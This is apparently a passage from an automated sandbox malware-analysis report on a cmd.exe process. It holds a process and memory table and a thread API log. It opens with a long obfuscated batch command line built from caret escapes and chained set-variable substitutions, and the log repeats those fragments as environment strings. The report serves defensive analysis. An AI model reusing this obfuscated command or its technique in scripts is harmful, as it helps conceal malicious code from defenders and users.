^e^o^2^3^T^d^]^7^y^)^'^F^3^pb^f^6^Td^3^8P.^Y^.^Y^)^.^Y.^Y^^^^^^^\|^G^C7^y^y^P^j^4^w^L^R^e^o^2^h8^P^Z7^y^w^L^3^p^T^d^.^Y^.^Y^-n^X^q^F^3^p^b^fN^Z^q^F^3^p^b^fN^%^w^L^]^6^7^y^j^U^6^%^e^.^Y^.^Y^-^q^F^3^p^b^fNX^3^p^P^j^.Y^-^4^Z^qF^3^p^b^fN^.^Y^%^z^w^Lh^e^3^7^3^78^Pn^.^Y^-^8^P^7^8^P^,^v^%e^P^j^q^F^3^pb^fN^k^7^y^P^jT^d^e,^.^Y^3^Q^e^A^C^`^GC^7^yy^7K^j^h^j^h^.^Y^.^Y^-n^P^j^G^C^7^y^y^]P^jz^w^Lh^e^3^p^8^P^.Y^.^Y^-^7^y^j^U^6P^j^m^u^Q^e^7^K^q^F^3^pb^fN^3^7^.^Y^.^Y.Y^.^Y^.^Y^^^^^^^^^^^^^^^&^1^.^Y^@^8^P^q^F^3^p^b^fN^7^y^8^ ^7^y^j^U6X^m^e^o^2^G^C^7^y^y^8^P^,^{^H^6^x^d^4^a^xH^6^x^d^4^a^x^5^P^j^y^-^Td^Q^X^en^22^)^1^@^Zn^k7y^v^%^.^Y^)^.^Y^.^Y^^^&^^^&^.^Y^.^Y^,^m3^7^'^8^P^7^w^L.^Y^.^Y^.^Y^,^.^,^.^Y^o^63^7^Z^/^T^.^o) , ) ; ; ; )&( ; ( ; ; ; (^S^e^t ^\^,^}_=^!^+^~^}^{^:A^C^=^9^!) ; ; ; ) )&& ( , (, (^s^e^T ^ ^ ^ ^`^?=^!^\^,^}^_^:^e^o^2^=^s^!) , , ) ; ; )&&( , ( ; ; (S^e^T ^ ^@^[^~=!^`^?:^e^=^I^!) , ) , )&( , , , (^S^e^T ^ ^ ^ ^@^+^=^!^@^[^~^:^.^=^g^!) , )&& ( (s^E^T ^ ^[^{=^!^@^+^^:^8^P^=e^!), )& ( ; ; ; (^S^e^T ^ ^{^@^}=^!^[^{^:'^=.^!), , , )& ( ; (^s^E^t ^ ^\^{=^!^{^@^}^:^2^=^'^!) , )&& ( , ; , ( , ; , ; , (^s^E^T ^}^]^,^$=^!^\^{^:^a^=^W^!) , ) , , )&& (^s^e^T ^\^[=^!^}^]^,^$^:^6^=^a^!)&& ( ( ; ; ; (s^e^t ^ ^ ^`^]^$=^!^\^[^:^4^W^x^=^2^!) ) )&& ( , ; , ;, (^S^e^T ^ ^ ^`^-^$=!^`^]^$:bf=^6!) , ; , ; , )& ( ,(,;,; , (^s^ET ^ ^ [^$^@^+=^!^`^-^$^:^7^K^=^A^!) , ) , ;, )& ( , (^S^e^t ^@^-=^!^[^$^@^+:^3^p=^l^!) ; ; ; )& (^S^et ^ ^ ^ ^~^`^^?=^!^@^-^:^:^=^^!)&&( , , (^s^e^t ^#^;=^!^~^`^^?^:^w^L^=^E^!) ,; , ; , )& ( ( , , (^s^e^T ^ ^^{^[=^!^#^;:^ ^=^0^!) , ) )& (^s^et ^ ^@^#^?^.=^!^*^{^[^:^g^Y^=^ ^!)&( , ( , , (^S^E^T ^ ^'^}^_^-=^!^@^#^?^.^:^8^0^=^:^!) ; ; ) )&&( , ( , (^s^e^t ^ ^ ^;^]=^!^'^}^_^-^:^j^U=^D^!) ) , )&( ; (^s^e^T ^ ^ ^`^\^+=^!^;^]^:^,^=^c^!) ; ; )&&( , ( , (S^e^T ^_^@^.^-=^!^`^\^+:^i^y^=^8^!) , , ) , , )&(^S^e^t ^ ^ ^ ^$^'=^
Initial Working Directory	C:\Users\aETAdzjz\Desktop\
Monitor	Start Time: 00:01:42, Reason: Child Process
Unmonitor	End Time: 00:02:06, Reason: Self Terminated
Monitor Duration	00:00:24

OS Process Information

»

Information	Value
PID	0xb04
Parent PID	0xac0 (c:\windows\system32\cmd.exe)
Is Created or Modified Executable
Integrity Level	Medium
Username	YKYD69Q\aETAdzjz
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x B08

Region

»

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	rw	-
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	rw	-
pagefile_0x0000000000020000	0x00020000	0x0002ffff	Pagefile Backed Memory	rw	-
private_0x0000000000030000	0x00030000	0x0012ffff	Private Memory	rw	-
pagefile_0x0000000000130000	0x00130000	0x00133fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000140000	0x00140000	0x00140fff	Pagefile Backed Memory	r	-
locale.nls	0x00150000	0x001b6fff	Memory Mapped File	r	-
pagefile_0x00000000001c0000	0x001c0000	0x001c6fff	Pagefile Backed Memory	r	-
private_0x00000000001d0000	0x001d0000	0x001dffff	Private Memory	rw	-
private_0x00000000001e0000	0x001e0000	0x002dffff	Private Memory	rw	-
private_0x00000000002e0000	0x002e0000	0x003dffff	Private Memory	rw	-
pagefile_0x00000000003e0000	0x003e0000	0x00567fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000570000	0x00570000	0x006f0fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000700000	0x00700000	0x01afffff	Pagefile Backed Memory	r	-
pagefile_0x0000000001b00000	0x01b00000	0x01b01fff	Pagefile Backed Memory	rw	-
pagefile_0x0000000001b10000	0x01b10000	0x01e52fff	Pagefile Backed Memory	r	-
private_0x0000000001e60000	0x01e60000	0x01e60fff	Private Memory	rw	-
private_0x0000000001e70000	0x01e70000	0x01e70fff	Private Memory	rw	-
private_0x0000000001e80000	0x01e80000	0x01f7ffff	Private Memory	rw	-
private_0x0000000001f80000	0x01f80000	0x0217ffff	Private Memory	rw	-
sortdefault.nls	0x02180000	0x0244efff	Memory Mapped File	r	-
cmd.exe	0x4a0b0000	0x4a108fff	Memory Mapped File	rwx	-
user32.dll	0x77a20000	0x77b19fff	Memory Mapped File	rwx	-
kernel32.dll	0x77b20000	0x77c3efff	Memory Mapped File	rwx	-
ntdll.dll	0x77c40000	0x77de8fff	Memory Mapped File	rwx	-
private_0x000000007efe0000	0x7efe0000	0x7ffdffff	Private Memory	r	-
pagefile_0x000000007efe0000	0x7efe0000	0x7f0dffff	Pagefile Backed Memory	r	-
private_0x000000007f0e0000	0x7f0e0000	0x7ffdffff	Private Memory	r	-
private_0x000000007ffe0000	0x7ffe0000	0x7ffeffff	Private Memory	r	-
winbrand.dll	0x7fef59a0000	0x7fef59a7fff	Memory Mapped File	rwx	-
kernelbase.dll	0x7fefdd60000	0x7fefddcafff	Memory Mapped File	rwx	-
gdi32.dll	0x7fefdf60000	0x7fefdfc6fff	Memory Mapped File	rwx	-
imm32.dll	0x7fefed60000	0x7fefed8dfff	Memory Mapped File	rwx	-
msctf.dll	0x7feff1e0000	0x7feff2e8fff	Memory Mapped File	rwx	-
usp10.dll	0x7feff4d0000	0x7feff598fff	Memory Mapped File	rwx	-
msvcrt.dll	0x7feff5a0000	0x7feff63efff	Memory Mapped File	rwx	-
lpk.dll	0x7feff860000	0x7feff86dfff	Memory Mapped File	rwx	-
apisetschema.dll	0x7fefff60000	0x7fefff60fff	Memory Mapped File	rwx	-
pagefile_0x000007fffffb0000	0x7fffffb0000	0x7fffffd2fff	Pagefile Backed Memory	r	-
private_0x000007fffffdd000	0x7fffffdd000	0x7fffffdefff	Private Memory	rw	-
private_0x000007fffffdf000	0x7fffffdf000	0x7fffffdffff	Private Memory	rw	-

Threads

Thread 0xb08

205

0

»

Category	Operation	Information	Count	Logfile
System	Get Time	type = System Time, time = 2018-11-06 10:24:14 (UTC)	1	Fn
System	Get Time	type = Ticks, time = 139917	1	Fn
Module	Get Handle	module_name = c:\windows\system32\cmd.exe, base_address = 0x4a0b0000	1	Fn
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x77b20000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetThreadUILanguage, address_out = 0x77b36d40	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	3	Fn
File	Open	filename = STD_INPUT_HANDLE	1	Fn
Environment	Get Environment String	-	2	Fn Data
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 24, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = AutoRun, data = 64, type = REG_NONE	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 64, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = AutoRun, data = 9, type = REG_NONE	1	Fn
Module	Get Filename	process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\system32\cmd.exe, size = 260	1	Fn
Environment	Get Environment String	name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client	1	Fn
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Environment	Get Environment String	name = PROMPT, result_out = $P$G	1	Fn
Environment	Get Environment String	name = COMSPEC, result_out = C:\Windows\system32\cmd.exe	1	Fn
Environment	Get Environment String	name = KEYS	1	Fn
File	Get Info	filename = C:\Users\aETAdzjz\Desktop, type = file_attributes	2	Fn
Environment	Set Environment String	name = =C:, value = C:\Users\aETAdzjz\Desktop	1	Fn
Environment	Get Environment String	-	1	Fn Data
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x77b20000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = CopyFileExW, address_out = 0x77b323d0	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = IsDebuggerPresent, address_out = 0x77b28290	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetConsoleInputExeNameW, address_out = 0x77b317e0	1	Fn
Environment	Get Environment String	name = ^z^w^L^h^wLT^d^3p^e^3^7^{^j^Un^#^P^j^y^+^2^X^b^2^)^.^Y^1^1^2^eo^2^2^+^26^3^p^.^Y^F3^p^2^+^2^]^2^+^2^.^Y^q^F^3^p^b^fN^2^+^2^8^P^4^-^P^j^3^Q^e^A^C^h^8^P^Z^8^P^,2^+^2^GC^7^y^2^+^2^[2^+^2^7^K^2^+^2^3^7^37^-^	1	Fn
Environment	Get Environment String	name = ^2^+^2^`k^7^y^8^P^.^Y^-7^K^e^o2^2^+^2^eo^2^8^Pm3^Qe^AC^3^p`^2^+2^q^F^3^p^bfN^6^m^8^P^.^Y^A^C^6^7^j^h`^e^o^2^G^C^7^y^8^P^m^'^j^U^]^6^2^+^2^4^2^+^2^Zn^.^AC^6^7^[^2^+^2^F^3^p^bf^b^f^k7y^u^u^Q^e^3^7^e^o^2^2+^2^6^K^F^3^p^]^.Y^j^h`^e^o^2^G^C^7^y^8^P^2^+^2^m^'^2^+^2^j^U^]^6^4^Zn^2^+2^.^'^u^2^+^2^Z^G^C^7^y^m^6^k^7^y^1^1F^3^p^]^.^Y^q^F^3^p^b^fN^8^P^G^C^7^y'a^2^+^2^8^P^3^QeA^C^7^y^j^U6^2^+2^3p^Z8^Pn^G^C7^y^)^'^2^+^2Pj^k^7^y^8^Pn^R^8^P^6^3^7^1^A^C6^2^+^2^7^2^+^2^	1	Fn
Environment	Get Environment String	name = ^z^w^LhG^C^7y^G^C7^y^k^7^y^e^o^2^8^ ^,^.^,.^Z^m^6.^2+^2^8^P^e^o^2^4ax^'^Zm^.^3^Q^e^AC^X2^+^2^7^'^,^X^2^+2^m^,^.^A^C^ ^,^.^F3^p^j^Un^,^.^2^+^2^.^6^G^C^7^y4^a^x^u^Q^e^7^y^e^o2^K_^X^'^2^+^2^k^7^yn^.^A^C^6^7^2^+2^)^)^[^2^+^2^F3^p^b^f^b^f^k^7^y^u^u^Q^e^2^+^2m^Q^e^6^KF^3^p^]^.^Y^u^`2^+^2^G^C^7y^2+^2^8^P^{^Pjy^.^Y^2^+^2^4^a^xj^Un^H^ ^[1^ ^'^2^+^2^'^H^)^3^Q^e^A^C^2^+^2^j^h^2^+^2^h^8^PZo^\^F^3^p^X^]^8^P^6^,^	1	Fn
Environment	Get Environment String	name = ^z^w^Lh^1^2^+^2^F^3^p^b^f^2^+^2^b^f^2^+^2k^7^y^uu^Q^e^7^.Y^Zn^1^ ^'^'^H^2^+^2^4^a^x^(^2^+^2^)^)\^F^3pb^f^b^f^k^7^yu^u^Q^e^2^+^2G^C^7^y^2^+^2^G^C^7^y^6^K^F^3^p^b^fb^f^k^7^y^u^u^Q^e^3^7e^o^2^'^6^wL^8^P^2^+^2^G^C^7^y^G^C^7^yy^Z^7^8^P^3p^1^F^3pb^fb^f^k^7^y^u^u^Q^e^7^6^x^d^2^+^2^F^3^p^b^f^2^+^2^b^f^k^7^y^uu^Q^e_^2^+^2^)[^F^3^p^bf^b^f^k^7^y^u^u^Q^e^m^Qe^2^+^2^{F^3^p^b^f^b^f^k^7^yu^u^Q^e^2+^2^_^	1	Fn
Environment	Get Environment String	name = ^z^w^L^h^P^j^y^8^ ^8^ z^w^L^h^2^+^2^3^p^X^2^+^2^X^]^1^1^F^3pb^f^b^f^2^+^2^k^7^y^u^uQ^e^G^C^7^y^G^C^7^y^'^u^-^3^Q^e^A^C^6n^3^7^j^Un^5^)^	1	Fn
Environment	Get Environment String	name = ^8^P^7^2^+^2G^C^7^y^'^w^L2^+^2n^,^X^3^7Zn^2^+^2^.^2^+^2^Pjy^8^ ^8^ ^7^Kj^h^7^y^j^U^6^ee^'^2^+^2^6^w^L8^P^G^C^7^y^j^h^2+^2GC^7^y^]^Zn^.^1^F3^p^b^f^b^f2^+^2^k^7^y^u^u^Q^e^2^+^2m^Q^e^{^ ^'^2^+^2^'^2+^2^j^Un^2^+^2^A^C^ ^(2^+^2^P^j^y^)2^+^2^)^2^)^'^R^8^P^k^7^y3p^6^7^y^j^U^6w^L^1^2^A^C^6^7^2^6^x^d^{^e^o^2^	1	Fn
Environment	Get Environment String	name = ^R^en^6^w^L^P^jy^{^7^y^j^U^6^	1	Fn
Environment	Get Environment String	name = ^z^w^Lh^7^K^]^P^j^y^#^H^)^'^R8^Pk^7^y^3^p^6^7^y^j^U^6^w^L^1^1^{^7y^j^U^6^	1	Fn
Environment	Get Environment String	name = ^z^w^Lh^7^K^]^P^j^y^A^Ci^y^+^{^7^y^j^U^6^	1	Fn
Environment	Get Environment String	name = ^zw^L^h7^K]P^j^yi^y^#+^{^7^y^j^U^6^	1	Fn
Environment	Get Environment String	name = z^w^L^h7^K^]^P^jy^j^Un^ ^b^f^)^6^x^d^{^e^o^2^	1	Fn
Environment	Get Environment String	name = R^en6w^L^P^j^y^{^7^y^jU^6^	1	Fn
Environment	Get Environment String	name = ^z^w^L^h^7^K^]P^j^y^jUn^4^a^x^H^)^'^R^8P^k^7^y^3p^6^7^y^j^U^6^wL1^1^{^7^y^j^U^6^	1	Fn
Environment	Get Environment String	name = ^z^w^L^h^7^K^]^P^j^y^j^Un^j^Un^i^y^+{^7y^j^U6^	1	Fn
Environment	Get Environment String	name = ^z^w^L^h^7^K^]^P^j^y^5^H^+^{7y^j^U^6^	1	Fn
Environment	Get Environment String	name = ^z^w^L^h^7^K^]^Pjy^i^y^j^Un^)^6x^d^{^e^o^2^	1	Fn
Environment	Get Environment String	name = ^R^en^6^w^L^P^j^y^{^7^y^j^U6^	1	Fn
Environment	Get Environment String	name = ^z^wL^h^7^K^]^P^jy^#^bf^)^)^^^&^^^&^.^Y^e^o^28^P^	1	Fn
Environment	Get Environment String	name = .^Y^.^Y^6^j^U^e/`^6^K^w^L^,^	1	Fn
Environment	Get Environment String	name = ^zw^L^h^Pj^.^Y^1^.^Z^.^Y^F^3p^b^f^6^Re^7^K^3^Q^e^A^C^3^p^8^P^8^ ^8^P^	1	Fn
Environment	Get Environment String	name = ^1^1T^d^j^h^.^Y^8^P^qF^3^pb^fN^7^y^8 ^e^o^2^3^T^d^]^7^y^)^'^F^3^pb^f^6^Td^3^8P.^Y^.^Y^)^.^Y.^Y^^^^^^^\|^G^C7^y^y^P^j^4^w^L^R^e^o^2^h8^P^Z7^y^w^L^3^p^T^d^.^Y^.^Y^-n^X^q^F^3^p^b^fN^Z^q^F^3^p^b^fN^	1	Fn
Environment	Get Environment String	name = ^w^L^]^6^7^y^j^U^6^	1	Fn
Environment	Get Environment String	name = ^e^.^Y^.^Y^-^q^F^3^p^b^fNX^3^p^P^j^.Y^-^4^Z^qF^3^p^b^fN^.^Y^	1	Fn
Environment	Get Environment String	name = ^z^w^Lh^e^3^7^3^78^Pn^.^Y^-^8^P^7^8^P^,^v^	1	Fn
Environment	Get Environment String	name = e^P^j^q^F^3^pb^fN^k^7^y^P^jT^d^e,^.^Y^3^Q^e^A^C^`^GC^7^yy^7K^j^h^j^h^.^Y^.^Y^-n^P^j^G^C^7^y^y^]P^jz^w^Lh^e^3^p^8^P^.Y^.^Y^-^7^y^j^U^6P^j^m^u^Q^e^7^K^q^F^3^pb^fN^3^7^.^Y^.^Y.Y^.^Y^.^Y^^^^^^^^^^^^^^^&^1^.^Y^@^8^P^q^F^3^p^b^fN^7^y^8^ ^7^y^j^U6X^m^e^o^2^G^C^7^y^y^8^P^,^{^H^6^x^d^4^a^xH^6^x^d^4^a^x^5^P^j^y^-^Td^Q^X^en^22^)^1^@^Zn^k7y^v^	1	Fn
Environment	Get Environment String	name = ^.^Y^)^.^Y^.^Y^^^&^^^&^.^Y^.^Y^,^m3^7^'^8^P^7^w^L.^Y^.^Y^.^Y^,^.^,^.^Y^o^63^7^Z^/^T^.^o) , ) ; ; ; )&( ; ( ; ; ; (^S^e^t ^\^,^}_=^!^+^~^}^{^	1	Fn
Environment	Get Environment String	name = ^=^T!)&& (, ; , ;, ( , ; , (^S^e^T ^ ^ ^ ^}^\=^!^[^$^#^?^	1	Fn
Environment	Get Environment String	name = ^!) , )&& ( , (^S^e^t ^ ^ ^^}=^!^^.^@^	1	Fn
Environment	Get Environment String	name = ^g; ; , ^iN , ( ,'; ; ^^ft^^Y^^p^^e ;; , ^\|, , ^^f^^iN^^d^^S^^t^^r ;^^c^^m '; ,) , ; ^d^o, , ;; ; (^e^c^h^O ,	1	Fn
Environment	Get Environment String	name = ^*^[^-^,	1	Fn
Environment	Get Environment String	name = \|	1	Fn
Environment	Get Environment String	name = +~}{, result_out = eo28PGC7y.Y.Yeo2vTd]F3pbf6K'.Y1.Y@eo2h8PZ7y8P3pTde37{jUnPjy+@eo2%zwLhwLTd3pe37{jUn#Pjy+2Xb2).Y112eo22+263p.YF3p2+2]2+2.YqF3pbfN2+28P4-Pj3QeACh8PZ8P,2+2GC7y2+2[2+27K2+23737-%2+2`k7y8P.Y-7Keo22+2eo28Pm3QeAC3p`2+2qF3pbfN6m8P.YAC67jh`eo2GC7y8Pm'jU]62+242+2Zn.AC67[2+2F3pbfbfk7yuuQe37eo22+26KF3p].Yjh`eo2GC7y8P2+2m'2+2jU]64Zn2+2.'u2+2ZGC7ym6k7y11F3p].YqF3pbfN8PGC7y'a2+28P3QeAC7yjU62+23pZ8PnGC7y)'2+2Pjk7y8PnR8P6371AC62+272+2%zwLhGC7yGC7yk7yeo28 ,.,.Zm6.2+28Peo24ax'Zm.3QeACX2+27',X2+2m,.AC ,.F3pjUn,.2+2.6GC7y4axuQe7yeo2K_X'2+2k7yn.AC672+2))[2+2F3pbfbfk7yuuQe2+2mQe6KF3p].Yu`2+2GC7y2+28P{Pjy.Y2+24axjUnH [1 '2+2'H)3QeAC2+2jh2+2h8PZo\F3pX]8P6,%zwLh12+2F3pbf2+2bf2+2k7yuuQe7.YZn1 ''H2+24ax(2+2))\F3pbfbfk7yuuQe2+2GC7y2+2GC7y6KF3pbfbfk7yuuQe37eo2'6wL8P2+2GC7yGC7yyZ78P3p1F3pbfbfk7yuuQe76xd2+2F3pbf2+2bfk7yuuQe_2+2)[F3pbfbfk7yuuQemQe2+2{F3pbfbfk7yuuQe2+2_:H4axiy+F3pbfbfk7yuuQe7Pjy6K1{m6GC7y%zwLhPjy8 8 zwLh2+23pX2+2X]11F3pbfbf2+2k7yuuQeGC7yGC7y'u-3QeAC6n37jUn5):jUnbf)-3QeACX]2+21F3pbfbfk7yuuQeGC7y2+2GC7y'6wL.Y-3QeAC6n37.YjUn5))}2+2}[2+2e2+2wLXb12+2{jh`eo2GC7y2+28Pm'%8P72+2GC7y'wL2+2n,X37Zn2+2.2+2Pjy8 8 7Kjh7yjU6ee'2+26wL8PGC7yjh2+2GC7y]Zn.1F3pbfbf2+2k7yuuQe2+2mQe{ '2+2'2+2jUn2+2AC (2+2Pjy)2+2)2)'R8Pk7y3p67yjU6wL12AC6726xd{eo2%Ren6wLPjy{7yjU6%zwLh7K]Pjy#H)'R8Pk7y3p67yjU6wL11{7yjU6%zwLh7K]PjyACiy+{7yjU6%zwLh7K]Pjyiy#+{7yjU6%zwLh7K]PjyjUn bf)6xd{eo2%Ren6wLPjy{7yjU6%zwLh7K]PjyjUn4axH)'R8Pk7y3p67yjU6wL11{7yjU6%zwLh7K]PjyjUnjUniy+{7yjU6%zwLh7K]Pjy5H+{7yjU6%zwLh7K]PjyiyjUn)6xd{eo2%Ren6wLPjy{7yjU6%zwLh7K]Pjy#bf))^&^&.Yeo28P%.Y.Y6jUe/`6KwL,%zwLhPj.Y1.Z.YF3pbf6Re7K3QeAC3p8P8 8P:XbGC7y)'7y6TdvwL'enF3pbfPjQewL7yjU6XmuQe6njU'eqF3pbfN7yPjQe8Peo27yjU6RZGC7yy%11Tdjh.Y8PqF3pbfN7y8 eo23Td]7y)'F3pbf6Td38P.Y.Y).Y.Y^^^\|GC7yyPj4wLReo2h8PZ7ywL3pTd.Y.Y-nXqF3pbfNZqF3pbfN%wL]67yjU6%e.Y.Y-qF3pbfNX3pPj.Y-4ZqF3pbfN.Y%zwLhe37378Pn.Y-8P78P,v%ePjqF3pbfNk7yPjTde,.Y3QeAC`GC7yy7Kjhjh.Y.Y-nPjGC7yy]PjzwLhe3p8P.Y.Y-7yjU6PjmuQe7KqF3pbfN37.Y.Y.Y.Y.Y^^^^^^^&1.Y@8PqF3pbfN7y8 7yjU6Xmeo2GC7yy8P,{H6xd4axH6xd4ax5Pjy-TdQXen22)1@Znk7yv%.Y).Y.Y^&^&.Y.Y,m37'8P7wL.Y.Y.Y,.,.Yo637Z/T.o	1	Fn
Environment	Get Environment String	name = \,}_, result_out = eo28PGC7y.Y.Yeo2vTd]F3pbf6K'.Y1.Y@eo2h8PZ7y8P3pTde37{jUnPjy+@eo2%zwLhwLTd3pe37{jUn#Pjy+2Xb2).Y112eo22+263p.YF3p2+2]2+2.YqF3pbfN2+28P4-Pj3Qe9h8PZ8P,2+2GC7y2+2[2+27K2+23737-%2+2`k7y8P.Y-7Keo22+2eo28Pm3Qe93p`2+2qF3pbfN6m8P.Y967jh`eo2GC7y8Pm'jU]62+242+2Zn.967[2+2F3pbfbfk7yuuQe37eo22+26KF3p].Yjh`eo2GC7y8P2+2m'2+2jU]64Zn2+2.'u2+2ZGC7ym6k7y11F3p].YqF3pbfN8PGC7y'a2+28P3Qe97yjU62+23pZ8PnGC7y)'2+2Pjk7y8PnR8P6371962+272+2%zwLhGC7yGC7yk7yeo28 ,.,.Zm6.2+28Peo24ax'Zm.3Qe9X2+27',X2+2m,.9 ,.F3pjUn,.2+2.6GC7y4axuQe7yeo2K_X'2+2k7yn.9672+2))[2+2F3pbfbfk7yuuQe2+2mQe6KF3p].Yu`2+2GC7y2+28P{Pjy.Y2+24axjUnH [1 '2+2'H)3Qe92+2jh2+2h8PZo\F3pX]8P6,%zwLh12+2F3pbf2+2bf2+2k7yuuQe7.YZn1 ''H2+24ax(2+2))\F3pbfbfk7yuuQe2+2GC7y2+2GC7y6KF3pbfbfk7yuuQe37eo2'6wL8P2+2GC7yGC7yyZ78P3p1F3pbfbfk7yuuQe76xd2+2F3pbf2+2bfk7yuuQe_2+2)[F3pbfbfk7yuuQemQe2+2{F3pbfbfk7yuuQe2+2_:H4axiy+F3pbfbfk7yuuQe7Pjy6K1{m6GC7y%zwLhPjy8 8 zwLh2+23pX2+2X]11F3pbfbf2+2k7yuuQeGC7yGC7y'u-3Qe96n37jUn5):jUnbf)-3Qe9X]2+21F3pbfbfk7yuuQeGC7y2+2GC7y'6wL.Y-3Qe96n37.YjUn5))}2+2}[2+2e2+2wLXb12+2{jh`eo2GC7y2+28Pm'%8P72+2GC7y'wL2+2n,X37Zn2+2.2+2Pjy8 8 7Kjh7yjU6ee'2+26wL8PGC7yjh2+2GC7y]Zn.1F3pbfbf2+2k7yuuQe2+2mQe{ '2+2'2+2jUn2+29 (2+2Pjy)2+2)2)'R8Pk7y3p67yjU6wL1296726xd{eo2%Ren6wLPjy{7yjU6%zwLh7K]Pjy#H)'R8Pk7y3p67yjU6wL11{7yjU6%zwLh7K]Pjy9iy+{7yjU6%zwLh7K]Pjyiy#+{7yjU6%zwLh7K]PjyjUn bf)6xd{eo2%Ren6wLPjy{7yjU6%zwLh7K]PjyjUn4axH)'R8Pk7y3p67yjU6wL11{7yjU6%zwLh7K]PjyjUnjUniy+{7yjU6%zwLh7K]Pjy5H+{7yjU6%zwLh7K]PjyiyjUn)6xd{eo2%Ren6wLPjy{7yjU6%zwLh7K]Pjy#bf))^&^&.Yeo28P%.Y.Y6jUe/`6KwL,%zwLhPj.Y1.Z.YF3pbf6Re7K3Qe93p8P8 8P:XbGC7y)'7y6TdvwL'enF3pbfPjQewL7yjU6XmuQe6njU'eqF3pbfN7yPjQe8Peo27yjU6RZGC7yy%11Tdjh.Y8PqF3pbfN7y8 eo23Td]7y)'F3pbf6Td38P.Y.Y).Y.Y^^^\|GC7yyPj4wLReo2h8PZ7ywL3pTd.Y.Y-nXqF3pbfNZqF3pbfN%wL]67yjU6%e.Y.Y-qF3pbfNX3pPj.Y-4ZqF3pbfN.Y%zwLhe37378Pn.Y-8P78P,v%ePjqF3pbfNk7yPjTde,.Y3Qe9`GC7yy7Kjhjh.Y.Y-nPjGC7yy]PjzwLhe3p8P.Y.Y-7yjU6PjmuQe7KqF3pbfN37.Y.Y.Y.Y.Y^^^^^^^&1.Y@8PqF3pbfN7y8 7yjU6Xmeo2GC7yy8P,{H6xd4axH6xd4ax5Pjy-TdQXen22)1@Znk7yv%.Y).Y.Y^&^&.Y.Y,m37'8P7wL.Y.Y.Y,.,.Yo637Z/T.o	1	Fn
